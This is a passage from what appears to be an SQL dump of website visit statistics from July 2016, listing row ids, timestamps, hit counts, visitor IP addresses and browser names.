5.68.202.190','firefox'),(51979,1469434243,1,1,0,0,'141.8.142.58','other'),(51980,1469434389,1,1,0,0,'92.113.8.38','firefox'),(51981,1469434553,1,1,0,0,'92.113.11.101','chrome'),(51982,1469435099,1,1,0,0,'91.196.178.104','firefox'),(51983,1469435747,1,1,0,0,'91.196.178.68','chrome'),(51984,1469437112,1,1,0,0,'91.196.178.39','firefox'),(51985,1469437186,2,2,0,0,'91.196.178.68','chrome'),(51986,1469437678,1,1,0,0,'178.95.163.174','chrome'),(51987,1469438148,1,0,1,0,'66.249.78.178',''),(51988,1469438495,1,1,0,0,'37.53.93.189','chrome'),(51989,1469438528,4,4,0,0,'91.196.178.68','firefox'),(51990,1469438542,1,1,0,0,'66.249.78.136','chrome'),(51991,1469438608,1,1,0,0,'62.80.185.138','other'),(51992,1469438655,3,3,0,0,'91.196.179.33','other'),(51993,1469438671,1,1,0,0,'31.13.102.99','other'),(51994,1469438673,1,1,0,0,'31.13.100.112','other'),(51996,1469438723,1,1,0,0,'91.196.178.72','firefox'),(51997,1469438770,1,1,0,0,'91.196.178.68','chrome'),(51998,1469438884,1,0,1,0,'66.249.78.150',''),(51999,1469439280,1,1,0,0,'66.249.78.150','chrome'),(52000,1469439412,3,3,0,0,'5.9.62.130','other'),(52001,1469439505,1,1,0,0,'94.179.242.65','chrome'),(52002,1469439834,1,0,1,0,'66.249.78.143',''),(52003,1469439995,1,0,1,0,'68.180.230.111',''),(52004,1469440686,1,1,0,0,'91.196.178.39','firefox'),(52005,1469440823,1,1,0,0,'178.95.246.169','firefox'),(52006,1469440906,1,1,0,0,'95.134.221.11','chrome'),(52007,1469441638,1,1,0,0,'212.90.166.70','firefox'),(52008,1469442520,1,1,0,0,'164.132.161.18','other'),(52009,1469442678,1,1,0,0,'141.0.14.154','other'),(52010,1469442820,1,1,0,0,'62.80.185.138','other'),(52011,1469443817,1,1,0,0,'93.158.152.84','other'),(52012,1469444045,1,1,0,0,'130.193.51.19','other'),(52013,1469444292,1,0,1,0,'66.249.78.150',''),(52014,1469444862,1,1,0,0,'51.255.65.40','other'),(52015,1469445087,1,1,0,0,'66.249.78.150','chrome'),(52016,1469445204,1,0,1,0,'66.249.78.143',''),(52017,1469445345,1,1,0,0,'66.249.69.189','chrome'),(52018,1469445395,2,0,2,0,'66.249.78.178',''),(52019,1469445403,1,1,0,0,'130.193.51.19','other'),(52020,1469445809,1,1,0,0,'51.255.65.96','other'),(52021,1469446019,1,1,0,0,'141.8.142.58','other'),(52022,1469446061,2,2,0,0,'91.196.178.68','firefox'),(52023,1469446248,1,1,0,0,'94.179.103.150','firefox'),(52024,1469446483,1,1,0,0,'66.249.78.150','chrome'),(52025,1469446700,1,1,0,0,'141.8.142.61','other'),(52026,1469446967,1,0,1,0,'66.249.78.136',''),(52027,1469447414,1,1,0,0,'91.196.178.72','firefox'),(52028,1469447607,1,1,0,0,'37.55.36.112','chrome'),(52029,1469448333,1,0,1,0,'66.249.78.136',''),(52030,1469448484,1,1,0,0,'91.196.178.97','firefox'),(52031,1469449010,1,1,0,0,'94.231.188.10','firefox'),(52032,1469449083,1,1,0,0,'5.45.192.68','chrome'),(52033,1469449544,1,1,0,0,'141.0.12.143','chrome'),(52034,1469449737,1,1,0,0,'178.92.8.200','chrome'),(52035,1469450014,1,1,0,0,'141.8.183.25','other'),(52036,1469450283,2,2,0,0,'130.193.50.34','other'),(52037,1469450722,1,1,0,0,'91.200.73.129','chrome'),(52038,1469451055,1,1,0,0,'91.196.178.68','firefox'),(52039,1469451562,2,1,1,0,'66.249.78.150',''),(52040,1469451757,1,1,0,0,'194.44.201.146','opera'),(52041,1469452063,1,1,0,0,'213.159.240.200','chrome'),(52042,1469452302,1,1,0,0,'91.196.178.68','firefox'),(52043,1469452963,1,1,0,0,'46.211.69.104','chrome'),(52044,1469453287,1,1,0,0,'46.200.145.54','chrome'),(52045,1469453298,1,1,0,0,'141.8.142.61','other'),(52046,1469453405,1,1,0,0,'37.73.212.46','chrome'),(52047,1469453641,1,0,1,0,'66.249.78.164',''),(52048,1469454391,1,1,0,0,'91.213.59.9','chrome'),(52049,1469454578,1,1,0,0,'91.196.178.68','firefox'),(52050,1469454604,1,1,0,0,'31.13.109.118','other'),(52051,1469454666,1,1,0,0,'66.249.93.117','chrome'),(52052,1469454688,274,274,0,0,'88.198.230.79','other'),(52053,1469454732,1,1,0,0,'91.124.118.216','firefox'),(52054,1469454748,1,1,0,0,'91.196.178.68','chrome'),(52055,1469454882,1,1,0,0,'195.211.23.206','chrome'),(52056,1469454954,1,1,0,0,'46.38.49.211','chrome'),(52057,1469455085,1,1,0,0,'91.196.178.131','chrome'),(52058,1469455455,1,1,0,0,'94.179.20.205','firefox'),(52059,1469455589,26,26,0,0,'88.198.230.79','other'),(52060,1469455643,1,1,0,0,'66.249.93.117','chrome'),(52061,1469455806,1,0,1,0,'66.249.78.136',''),(52062,1469456000,1,0,1,0,'66.249.78.150',''),(52063,1469456012,1,1,0,0,'46.211.71.125','firefox'),(52064,1469456618,1,1,0,0,'91.196.178.166','chrome'),(52065,1469456729,1,1,0,0,'37.73.238.13','other'),(52066,1469456814,1,1,0,0,'37.73.204.238','chrome'),(52067,1469457026,1,1,0,0,'91.196.178.97','chrome'),(52068,1469457169,1,1,0,0,'82.207.91.234','firefox'),(52069,1469457423,1,1,0,0,'94.179.2.8','other'),(52070,1469457965,1,1,0,0,'91.196.178.33','chrome'),(52071,1469457976,1,1,0,0,'91.196.178.134','chrome'),(52072,1469458080,1,1,0,0,'91.196.178.98','chrome'),(52073,1469458206,1,1,0,0,'54.244.49.214','msie'),(52074,1469458423,1,1,0,0,'46.211.6.159','chrome'),(52075,1469458493,1,1,0,0,'95.135.50.39','opera'),(52076,1469458739,1,1,0,0,'37.52.18.99','chrome'),(52077,1469458745,1,1,0,0,'37.73.200.167','chrome'),(52078,1469459023,1,1,0,0,'91.196.178.67','chrome'),(52079,1469459463,1,1,0,0,'212.55.84.26','chrome'),(52080,1469459482,2,2,0,0,'213.251.184.38','other'),(52081,1469459882,1,0,1,0,'66.249.78.136',''),(52082,1469460033,1,1,0,0,'130.193.51.19','other'),(52083,1469460216,1,1,0,0,'141.8.142.61','other'),(52084,1469460336,1,1,0,0,'134.249.175.240','chrome'),(52085,1469460422,1,1,0,0,'216.163.188.238','firefox'),(52086,1469460546,1,1,0,0,'91.196.178.131','other'),(52087,1469460590,1,1,0,0,'66.249.69.187','chrome'),(52088,1469460861,1,1,0,0,'37.55.225.235','chrome'),(52089,1469460935,1,1,0,0,'46.211.143.35','chrome'),(52090,1469461007,1,1,0,0,'188.32.226.56','msie'),(52091,1469461204,1,1,0,0,'141.8.183.25','other'),(52092,1469461270,1,1,0,0,'66.249.78.136','chrome'),(52093,1469461323,1,1,0,0,'37.73.242.198','other'),(52094,1469461529,1,1,0,0,'46.211.255.3','other'),(52095,1469461956,1,1,0,0,'212.55.88.7','chrome'),(52096,1469461969,1,1,0,0,'111.206.36.137','msie'),(52097,1469461973,1,1,0,0,'180.76.15.29','other'),(52098,1469462115,1,1,0,0,'46.211.114.158','chrome'),(52099,1469462384,1,0,1,0,'66.249.78.150',''),(52100,1469462559,1,1,0,0,'94.179.91.225','chrome'),(52101,1469462609,1,1,0,0,'91.196.178.97','chrome'),(52102,1469463061,1,1,0,0,'37.73.255.218','chrome'),(52103,1469463248,1,1,0,0,'91.196.178.129','other'),(52104,1469463349,187,187,0,0,'31.31.73.93','other'),(52105,1469463670,1,1,0,0,'46.211.1.88','other'),(52106,1469463674,1,0,1,0,'66.249.78.171',''),(52107,1469464253,113,113,0,0,'31.31.73.93','other'),(52108,1469464319,1,0,1,0,'66.249.78.150',''),(52109,1469464793,1,0,1,0,'66.249.78.143',''),(52110,1469465291,1,1,0,0,'66.249.78.150','chrome'),(52111,1469465388,1,1,0,0,'46.211.6.144','chrome'),(52112,1469465410,2,2,0,0,'66.249.78.143','chrome'),(52113,1469465499,1,1,0,0,'37.73.200.167','chrome'),(52114,1469465689,1,1,0,0,'78.27.190.80','chrome'),(52115,1469465893,1,1,0,0,'91.196.178.69','chrome'),(52116,1469466727,1,0,1,0,'66.249.78.136',''),(52117,1469466837,1,1,0,0,'94.179.106.217','other'),(52118,1469466923,1,1,0,0,'91.196.178.65','firefox'),(52119,1469467024,1,1,0,0,'91.196.178.34','chrome'),(52120,1469467341,1,1,0,0,'92.112.104.150','chrome'),(52121,1469467436,1,0,1,0,'66.249.78.178',''),(52122,1469467519,1,0,1,0,'66.249.78.164',''),(52123,1469467973,2,2,0,0,'66.249.78.143','chrome'),(52124,1469468283,1,1,0,0,'82.145.208.73','other'),(52125,1469468800,1,1,0,0,'176.77.118.1','msie'),(52126,1469468916,1,1,0,0,'66.249.78.143','chrome'),(52127,1469469325,3,1,2,0,'66.249.78.150',''),(52128,1469469744,1,1,0,0,'91.124.118.216','firefox'),(52129,1469469758,1,1,0,0,'157.55.39.160','other'),(52130,1469469892,1,1,0,0,'66.249.78.136','chrome'),(52131,1469469909,1,0,1,0,'66.249.78.178',''),(52132,1469469970,1,1,0,0,'95.135.34.50','chrome'),(52133,1469469975,1,1,0,0,'95.135.147.170','msie'),(52134,1469470037,1,0,1,0,'66.249.78.164',''),(52135,1469470413,1,1,0,0,'82.145.219.194','other'),(52136,1469470701,1,1,0,0,'91.196.178.131','chrome'),(52137,1469471010,1,1,0,0,'78.111.185.107','chrome'),(52138,1469471364,1,1,0,0,'66.249.81.205','chrome'),(52139,1469471417,1,0,1,0,'66.249.78.171',''),(52140,1469471505,1,0,1,0,'66.249.78.143',''),(52141,1469471506,1,0,1,0,'66.249.78.150',''),(52142,1469471946,1,0,1,0,'66.249.78.136',''),(52143,1469472042,2,0,2,0,'66.249.78.178',''),(52144,1469472221,3,3,0,0,'91.124.118.216','firefox'),(52145,1469472544,1,1,0,0,'66.249.78.164','chrome'),(52146,1469472623,1,1,0,0,'91.196.178.163','other'),(52147,1469472628,1,0,1,0,'66.249.78.143',''),(52148,1469472806,1,1,0,0,'91.196.178.104','chrome'),(52149,1469472812,4,3,1,0,'66.249.78.143',''),(52150,1469472977,1,0,1,0,'66.249.78.178',''),(52151,1469473135,1,1,0,0,'91.124.118.216','firefox'),(52152,1469473199,1,1,0,0,'141.8.142.61','other'),(52153,1469473291,1,1,0,0,'130.193.51.19','other'),(52154,1469473315,1,1,0,0,'94.178.80.151','chrome'),(52155,1469473424,1,1,0,0,'37.73.233.28','other'),(52156,1469473470,1,1,0,0,'93.158.152.9','other'),(52157,1469473617,1,1,0,0,'130.193.50.34','other'),(52158,1469473695,1,1,0,0,'91.196.178.72','other'),(52159,1469473852,1,1,0,0,'94.178.147.249','chrome'),(52160,1469473884,1,1,0,0,'91.196.178.67','chrome'),(52161,1469474115,1,0,1,0,'66.249.66.183',''),(52162,1469474158,1,1,0,0,'66.249.66.182','chrome'),(52163,1469474478,1,1,0,0,'91.196.178.165','chrome'),(52164,1469474698,1,1,0,0,'37.55.59.143','other'),(52165,1469474706,1,1,0,0,'91.196.178.69','chrome'),(52166,1469474982,1,1,0,0,'91.196.178.38','chrome'),(52167,1469474992,1,1,0,0,'91.124.118.216','firefox'),(52168,1469475101,1,1,0,0,'91.196.178.100','chrome'),(52169,1469475111,1,1,0,0,'66.249.93.109','chrome'),(52170,1469475596,1,1,0,0,'178.92.251.252','firefox'),(52171,1469475623,1,1,0,0,'46.133.235.180','other'),(52172,1469475968,1,1,0,0,'91.196.178.36','other'),(52173,1469476245,1,1,0,0,'91.196.178.100','chrome'),(52174,1469476339,1,1,0,0,'95.133.238.7','chrome'),(52175,1469476398,1,1,0,0,'91.196.178.101','chrome'),(52176,1469477189,1,1,0,0,'51.255.65.27','other'),(52177,1469477951,1,1,0,0,'91.196.178.67','chrome'),(52178,1469478184,1,1,0,0,'164.132.161.6','other'),(52179,1469478204,1,0,1,0,'66.249.66.188',''),(52180,1469478568,1,0,1,0,'66.249.79.179',''),(52181,1469478593,1,1,0,0,'66.249.66.188','chrome'),(52182,1469479189,1,1,0,0,'37.73.248.124','chrome'),(52183,1469479215,1,1,0,0,'66.249.66.182','chrome'),(52184,1469479845,1,1,0,0,'37.52.23.188','other'),(52185,1469479989,1,1,0,0,'37.55.59.202','chrome'),(52186,1469480029,4,1,3,0,'66.249.66.185',''),(52187,1469480121,1,1,0,0,'195.58.251.151','chrome'),(52188,1469480557,1,0,1,0,'66.249.66.188',''),(52189,1469480579,1,0,1,0,'66.249.66.182',''),(52190,1469481398,2,2,0,0,'82.145.211.110','other'),(52191,1469481531,1,0,1,0,'66.249.66.177',''),(52192,1469481569,1,1,0,0,'46.185.2.211','firefox'),(52193,1469482001,1,1,0,0,'91.196.178.167','chrome'),(52194,1469482300,1,1,0,0,'93.158.152.84','other'),(52195,1469482343,1,1,0,0,'51.255.65.72','other'),(52196,1469482454,3,0,3,0,'68.180.230.111',''),(52197,1469482688,1,1,0,0,'46.185.2.211','firefox'),(52198,1469483025,1,1,0,0,'130.193.50.34','other'),(52199,1469483080,2,2,0,0,'141.8.183.25','other'),(52200,1469483128,1,1,0,0,'141.8.142.67','other'),(52201,1469483268,2,2,0,0,'141.8.142.61','other'),(52202,1469483538,1,1,0,0,'82.145.219.184','other'),(52203,1469483544,1,1,0,0,'51.255.65.68','other'),(52204,1469483548,1,1,0,0,'141.8.142.58','other'),(52205,1469484053,1,1,0,0,'51.255.65.33','other'),(52206,1469484085,1,1,0,0,'37.55.57.151','chrome'),(52207,1469485032,1,1,0,0,'66.249.66.183','chrome'),(52208,1469486390,1,1,0,0,'164.132.161.6','other'),(52209,1469486460,1,1,0,0,'51.255.65.64','other'),(52210,1469486820,1,1,0,0,'208.115.113.92','other'),(52211,1469487081,1,0,1,0,'66.249.66.188',''),(52212,1469487446,1,1,0,0,'91.196.178.39','other'),(52213,1469487648,1,1,0,0,'37.73.197.116','chrome'),(52214,1469487876,1,1,0,0,'37.73.250.22','other'),(52215,1469490128,1,1,0,0,'91.196.178.97','chrome'),(52216,1469490155,1,0,1,0,'66.249.66.182',''),(52217,1469490458,2,1,1,0,'66.249.66.182',''),(52218,1469491142,1,0,1,0,'66.249.66.188',''),(52219,1469491213,1,0,1,0,'66.249.66.180',''),(52220,1469491280,1,0,1,0,'66.249.66.177',''),(52221,1469491377,1,1,0,0,'130.193.50.6','other'),(52222,1469491491,1,1,0,0,'141.8.183.25','other'),(52223,1469491646,1,1,0,0,'141.8.142.61','other'),(52224,1469491801,1,1,0,0,'46.211.143.84','other'),(52225,1469492306,1,0,1,0,'66.249.66.185',''),(52226,1469492401,1,1,0,0,'66.249.69.187','chrome'),(52227,1469492424,2,2,0,0,'38.80.23.70','msie'),(52228,1469492470,2,0,2,0,'66.249.66.182',''),(52229,1469493560,1,1,0,0,'208.115.113.92','other'),(52230,1469496235,2,2,0,0,'208.115.113.92','other'),(52231,1469497665,1,1,0,0,'37.73.213.45','other'),(52232,1469498406,1,1,0,0,'93.158.152.84','other'),(52233,1469499251,1,1,0,0,'91.196.178.39','other'),(52234,1469500324,2,2,0,0,'195.34.204.152','chrome'),(52235,1469505273,1,1,0,0,'66.249.66.185','chrome'),(52236,1469505460,1,1,0,0,'66.249.66.188','chrome'),(52237,1469506836,1,1,0,0,'180.76.15.147','other'),(52238,1469508718,1,0,1,0,'66.249.66.188',''),(52239,1469509967,1,1,0,0,'91.196.178.101','firefox'),(52240,1469510077,1,1,0,0,'208.115.113.92','other'),(52241,1469510870,1,1,0,0,'37.55.239.57','opera'),(52242,1469510898,1,1,0,0,'46.211.5.46','other'),(52243,1469511133,1,1,0,0,'92.113.156.247','other'),(52244,1469511884,1,0,1,0,'66.249.66.185',''),(52245,1469512790,1,1,0,0,'91.196.178.68','firefox'),(52246,1469512916,1,1,0,0,'208.115.113.92','other'),(52247,1469512988,1,0,1,0,'66.249.66.180',''),(52248,1469513104,1,0,1,0,'66.249.66.183',''),(52249,1469513146,1,1,0,0,'95.67.78.122','firefox'),(52250,1469513693,1,1,0,0,'66.249.83.250','chrome'),(52251,1469513714,1,1,0,0,'46.201.179.67','opera'),(52252,1469514159,1,1,0,0,'91.196.178.68','chrome'),(52253,1469514722,1,1,0,0,'91.196.178.65','chrome'),(52254,1469514763,1,1,0,0,'89.76.150.175','chrome'),(52255,1469514833,1,1,0,0,'37.73.251.163','chrome'),(52256,1469514923,1,1,0,0,'46.201.179.67','opera'),(52257,1469514976,1,1,0,0,'51.255.65.33','other'),(52258,1469515195,1,1,0,0,'91.196.178.37','other'),(52259,1469515205,1,1,0,0,'151.80.31.178','other'),(52260,1469515486,1,1,0,0,'164.132.161.91','other'),(52261,1469516169,1,1,0,0,'91.196.177.15','chrome'),(52262,1469516223,2,2,0,0,'91.196.178.68','firefox'),(52263,1469516255,1,1,0,0,'66.249.66.182','chrome'),(52264,1469516602,1,1,0,0,'151.80.31.182','other'),(52265,1469516668,1,1,0,0,'37.73.211.68','chrome'),(52266,1469516733,1,1,0,0,'130.180.216.73','chrome'),(52267,1469516838,1,1,0,0,'95.135.213.219','chrome'),(52268,1469517374,1,1,0,0,'93.73.234.193','firefox'),(52269,1469517999,1,1,0,0,'94.179.252.78','chrome'),(52270,1469518146,1,1,0,0,'109.122.62.2','chrome'),(52271,1469518477,1,1,0,0,'91.196.178.68','chrome'),(52272,1469519161,1,1,0,0,'66.249.66.185','chrome'),(52273,1469519446,1,1,0,0,'46.200.150.209','chrome'),(52274,1469519459,1,1,0,0,'130.193.37.7','other'),(52275,1469519683,1,1,0,0,'130.180.212.112','chrome'),(52276,1469519692,1,1,0,0,'130.193.51.14','other'),(52277,1469519794,1,1,0,0,'66.249.66.182','chrome'),(52278,1469520044,1,1,0,0,'94.179.242.65','chrome'),(52279,1469520273,1,1,0,0,'164.132.161.59','other'),(52280,1469520433,1,1,0,0,'51.255.65.66','other'),(52281,1469520449,1,1,0,0,'37.229.205.115','chrome'),(52282,1469520669,1,1,0,0,'51.255.65.24','other'),(52283,1469520924,1,1,0,0,'37.73.216.246','chrome'),(52284,1469521173,1,1,0,0,'91.193.166.97','chrome'),(52285,1469521184,2,2,0,0,'195.154.194.178','other'),(52286,1469521187,1,1,0,0,'195.154.194.178','firefox'),(52287,1469521401,1,1,0,0,'37.73.197.210','chrome'),(52288,1469521449,1,1,0,0,'94.179.208.219','chrome'),(52289,1469521587,2,1,1,0,'66.249.66.185',''),(52290,1469521708,1,1,0,0,'173.234.159.250','other'),(52291,1469521948,1,0,1,0,'66.249.66.180',''),(52292,1469521989,2,1,1,0,'66.249.66.188',''),(52293,1469522218,1,1,0,0,'141.0.15.88','other'),(52294,1469522316,1,1,0,0,'91.196.178.35','other'),(52295,1469522387,1,1,0,0,'95.132.44.163','chrome'),(52296,1469522398,1,1,0,0,'141.0.15.63','other'),(52297,1469522572,2,2,0,0,'92.238.226.245','other'),(52298,1469522667,1,1,0,0,'91.196.89.4','firefox'),(52299,1469523093,1,1,0,0,'66.249.66.182','chrome'),(52300,1469523387,1,1,0,0,'46.200.57.58','opera'),(52301,1469523715,3,3,0,0,'78.111.185.21','firefox'),(52302,1469523778,1,1,0,0,'66.249.66.188','chrome'),(52303,1469524953,1,1,0,0,'91.196.178.68','firefox'),(52304,1469525054,1,0,1,0,'66.249.66.180',''),(52305,1469525157,2,0,2,0,'66.249.66.188',''),(52306,1469525297,2,0,2,0,'66.249.66.185',''),(52307,1469525334,1,1,0,0,'5.255.198.69','other'),(52308,1469525419,1,1,0,0,'91.124.13.247','opera'),(52309,1469525559,1,0,1,0,'66.249.66.183',''),(52310,1469526477,1,1,0,0,'37.53.93.189','chrome'),(52311,1469526608,2,0,2,0,'66.249.66.182',''),(52312,1469527047,1,0,1,0,'66.249.66.177',''),(52313,1469527260,1,1,0,0,'91.196.177.94','firefox'),(52314,1469527370,1,1,0,0,'37.52.23.188','other'),(52315,1469527762,1,1,0,0,'37.73.234.144','chrome'),(52316,1469528145,173,173,0,0,'195.154.185.20','other'),(52317,1469528259,1,1,0,0,'141.8.142.61','other'),(52318,1469528288,1,1,0,0,'178.154.189.37','other'),(52319,1469528463,1,0,1,0,'66.249.66.182',''),(52320,1469528592,1,0,1,0,'66.249.66.180',''),(52321,1469528796,1,1,0,0,'91.196.178.163','chrome'),(52322,1469529559,1,1,0,0,'77.121.126.193','chrome'),(52323,1469529716,1,1,0,0,'176.98.26.103','firefox'),(52324,1469529728,1,1,0,0,'93.158.152.40','other'),(52325,1469530085,1,1,0,0,'91.196.178.65','firefox'),(52326,1469530674,1,1,0,0,'92.113.134.40','firefox'),(52327,1469531248,1,1,0,0,'91.196.178.68','firefox'),(52328,1469531606,2,0,2,0,'66.249.66.185',''),(52329,1469532137,1,1,0,0,'66.249.66.180','chrome'),(52330,1469532230,1,1,0,0,'37.53.229.166','chrome'),(52331,1469532601,1,1,0,0,'82.145.209.3','other'),(52332,1469532910,1,1,0,0,'180.76.15.5','other'),(52333,1469533051,1,0,1,0,'66.249.66.183',''),(52334,1469533495,1,0,1,0,'66.249.66.182',''),(52335,1469534236,2,0,2,0,'66.249.66.185',''),(52336,1469534557,1,1,0,0,'82.145.219.33','other'),(52337,1469534621,1,0,1,0,'66.249.66.182',''),(52338,1469534640,1,1,0,0,'213.179.252.155','chrome'),(52339,1469535055,3,3,0,0,'88.233.219.186','other'),(52340,1469535287,1,0,1,0,'66.249.66.180',''),(52341,1469535312,1,1,0,0,'178.93.148.99','chrome'),(52342,1469535324,1,0,1,0,'66.249.66.183',''),(52343,1469535337,1,1,0,0,'130.180.216.98','chrome'),(52344,1469535467,1,1,0,0,'95.134.116.203','chrome'),(52345,1469536225,1,0,1,0,'66.249.66.180',''),(52346,1469536238,1,1,0,0,'130.180.216.98','chrome'),(52347,1469536287,2,0,2,0,'66.249.66.185',''),(52348,1469536751,1,1,0,0,'66.249.93.109','chrome'),(52349,1469536829,4,4,0,0,'62.210.148.246','other'),(52350,1469536830,2,0,2,0,'66.249.66.188',''),(52351,1469537106,1,0,1,0,'66.249.66.183',''),(52352,1469537484,1,1,0,0,'178.92.201.12','msie'),(52353,1469537915,2,0,2,0,'66.249.66.182',''),(52354,1469538211,2,2,0,0,'195.154.194.178','other'),(52355,1469538215,1,1,0,0,'195.154.194.178','firefox'),(52356,1469538421,1,1,0,0,'66.249.66.188','chrome'),(52357,1469538486,1,1,0,0,'91.196.178.68','firefox'),(52358,1469538488,1,0,1,0,'66.249.66.177',''),(52359,1469538604,1,0,1,0,'66.249.66.183',''),(52360,1469539014,1,1,0,0,'91.196.178.65','chrome'),(52361,1469539128,1,1,0,0,'180.76.15.163','other'),(52362,1469539485,1,1,0,0,'95.134.184.146','chrome'),(52363,1469539504,1,1,0,0,'81.162.249.177','chrome'),(52364,1469539603,1,1,0,0,'141.0.14.13','other'),(52365,1469539879,1,1,0,0,'91.196.178.68','firefox'),(52366,1469539934,1,0,1,0,'66.249.66.183',''),(52367,1469540028,1,1,0,0,'212.55.84.26','chrome'),(52368,1469540334,1,1,0,0,'37.52.20.84','chrome'),(52369,1469540383,1,1,0,0,'40.77.167.36','other'),(52370,1469541138,1,1,0,0,'180.76.15.162','other'),(52371,1469541513,2,2,0,0,'195.154.194.178','other'),(52372,1469541515,1,1,0,0,'195.154.194.178','firefox'),(52373,1469542942,1,1,0,0,'94.179.63.121','chrome'),(52374,1469544140,1,1,0,0,'91.196.178.40','firefox'),(52375,1469544340,1,0,1,0,'66.249.69.189',''),(52376,1469544518,1,1,0,0,'37.53.93.189','chrome'),(52377,1469544925,1,1,0,0,'91.79.90.182','opera'),(52378,1469544926,1,1,0,0,'5.164.69.252','msie'),(52379,1469544927,1,1,0,0,'46.73.198.194','chrome'),(52381,1469544929,1,1,0,0,'176.77.63.70','chrome'),(52382,1469545190,1,1,0,0,'37.73.241.165','chrome'),(52383,1469545339,1,1,0,0,'78.111.185.100','chrome'),(52384,1469545383,1,0,1,0,'66.249.66.185',''),(52385,1469546376,1,1,0,0,'78.111.185.100','chrome'),(52386,1469546976,1,1,0,0,'91.196.178.168','chrome'),(52387,1469547316,1,0,1,0,'66.249.66.188',''),(52388,1469548003,1,1,0,0,'130.180.219.185','chrome'),(52389,1469548609,1,1,0,0,'91.222.250.50','firefox'),(52390,1469548834,1,0,1,0,'66.249.66.182',''),(52391,1469549389,1,1,0,0,'82.193.98.219','chrome'),(52392,1469549498,1,0,1,0,'66.249.66.177',''),(52393,1469550467,1,1,0,0,'37.73.201.83','other'),(52394,1469550810,1,0,1,0,'66.249.66.188',''),(52395,1469550891,1,1,0,0,'91.196.178.167','other'),(52396,1469551977,1,0,1,0,'66.249.66.183',''),(52397,1469553050,1,1,0,0,'94.158.95.255','chrome'),(52398,1469553222,1,1,0,0,'174.129.237.157','other'),(52399,1469553454,24,24,0,0,'208.43.225.85','other'),(52400,1469553837,2,2,0,0,'91.196.178.70','chrome'),(52401,1469553864,1,0,1,0,'66.249.66.182',''),(52402,1469553900,1,1,0,0,'151.80.31.109','other'),(52403,1469554166,1,1,0,0,'164.132.161.85','other'),(52404,1469554183,1,0,1,0,'66.249.66.183',''),(52405,1469554546,1,0,1,0,'66.249.66.188',''),(52406,1469554717,1,1,0,0,'95.158.2.61','chrome'),(52407,1469555110,1,1,0,0,'37.73.246.197','chrome'),(52408,1469555166,1,1,0,0,'37.73.225.206','chrome'),(52409,1469555230,1,1,0,0,'208.115.113.92','other'),(52410,1469555791,2,2,0,0,'174.129.237.157','other'),(52411,1469555934,1,0,1,0,'66.249.66.180',''),(52412,1469556342,1,1,0,0,'46.211.3.35','other'),(52413,1469556623,1,1,0,0,'66.249.69.152','chrome'),(52414,1469556949,1,1,0,0,'180.76.15.136','other'),(52415,1469557385,1,1,0,0,'91.196.178.168','chrome'),(52416,1469557951,1,1,0,0,'51.255.65.94','other'),(52417,1469558553,1,1,0,0,'174.129.237.157','other'),(52418,1469558556,1,0,1,0,'66.249.66.188',''),(52419,1469558639,2,0,2,0,'66.249.66.185',''),(52420,1469558800,1,1,0,0,'151.80.31.165','other'),(52421,1469559155,1,0,1,0,'66.249.66.183',''),(52422,1469559174,1,1,0,0,'82.145.210.178','other'),(52423,1469559251,1,1,0,0,'91.124.118.216','firefox'),(52424,1469559527,1,1,0,0,'174.129.237.157','other'),(52425,1469559872,2,0,2,0,'66.249.66.188',''),(52426,1469560164,1,1,0,0,'164.132.161.53','other'),(52427,1469560192,1,1,0,0,'93.80.24.168','msie'),(52428,1469560232,1,1,0,0,'178.92.8.200','chrome'),(52429,1469560326,1,0,1,0,'66.249.66.185',''),(52430,1469560484,1,1,0,0,'82.145.216.188','other'),(52431,1469560778,1,0,1,0,'66.249.66.183',''),(52432,1469562444,1,1,0,0,'164.132.161.44','other'),(52433,1469562604,1,0,1,0,'66.249.66.182',''),(52434,1469562666,1,1,0,0,'91.196.178.131','other'),(52435,1469562760,2,2,0,0,'66.249.66.188','chrome'),(52436,1469563267,1,1,0,0,'91.196.178.164','other'),(52437,1469563538,1,1,0,0,'91.196.178.131','firefox'),(52438,1469563575,1,1,0,0,'51.255.65.38','other'),(52439,1469564529,1,1,0,0,'51.255.65.32','other'),(52440,1469564638,1,1,0,0,'51.255.65.13','other'),(52441,1469565528,1,1,0,0,'180.76.15.13','other'),(52442,1469565693,1,1,0,0,'93.171.241.65','other'),(52443,1469566237,1,1,0,0,'93.185.26.30','other'),(52444,1469566489,1,1,0,0,'5.9.63.149','other'),(52445,1469567024,1,0,1,0,'66.249.66.177',''),(52446,1469567394,1,1,0,0,'46.200.21.37','chrome'),(52447,1469567830,1,1,0,0,'180.76.15.151','other'),(52448,1469568578,1,1,0,0,'91.196.178.103','other'),(52449,1469571343,1,1,0,0,'178.95.159.177','chrome'),(52450,1469573078,1,0,1,0,'66.249.66.185',''),(52451,1469573079,1,1,0,0,'208.115.113.92','other'),(52452,1469573702,1,1,0,0,'51.255.65.16','other'),(52453,1469573859,1,0,1,0,'68.180.230.111',''),(52454,1469575123,1,1,0,0,'217.69.133.69','other'),(52455,1469575236,4,0,4,0,'66.249.66.182',''),(52456,1469575260,2,0,2,0,'66.249.66.185',''),(52457,1469575406,1,0,1,0,'66.249.66.180',''),(52458,1469576426,1,1,0,0,'94.178.6.61','chrome'),(52459,1469576640,2,0,2,0,'66.249.66.182',''),(52460,1469576909,2,0,2,0,'66.249.66.180',''),(52461,1469576928,1,1,0,0,'40.77.167.55','other'),(52462,1469577891,1,1,0,0,'208.115.113.82','other'),(52463,1469578697,1,0,1,0,'66.249.66.188',''),(52464,1469579813,2,0,2,0,'66.249.69.189',''),(52465,1469580717,1,1,0,0,'66.249.66.185','chrome'),(52466,1469581282,2,0,2,0,'66.249.66.177',''),(52467,1469582982,1,1,0,0,'176.14.110.199','msie'),(52468,1469582992,1,0,1,0,'66.249.66.188',''),(52469,1469582996,1,1,0,0,'128.68.50.240','msie'),(52470,1469582999,1,1,0,0,'95.221.195.252','msie'),(52471,1469583000,1,1,0,0,'93.80.118.8','msie'),(52472,1469583008,1,1,0,0,'93.80.233.149','msie'),(52473,1469583073,1,0,1,0,'66.249.66.182',''),(52474,1469584351,1,0,1,0,'66.249.69.187',''),(52475,1469584868,1,1,0,0,'208.115.113.92','other'),(52476,1469586545,1,1,0,0,'51.255.65.11','other'),(52477,1469586832,1,1,0,0,'164.132.161.71','other'),(52478,1469587813,1,0,1,0,'66.249.66.82',''),(52479,1469588050,1,0,1,0,'68.180.230.178',''),(52480,1469588540,1,1,0,0,'51.255.65.56','other'),(52481,1469588758,1,0,1,0,'66.249.66.182',''),(52482,1469588759,1,0,1,0,'66.249.66.185',''),(52483,1469590530,1,0,1,0,'66.249.66.182',''),(52484,1469590927,1,0,1,0,'66.249.66.188',''),(52485,1469591098,1,0,1,0,'66.249.66.183',''),(52486,1469591192,3,1,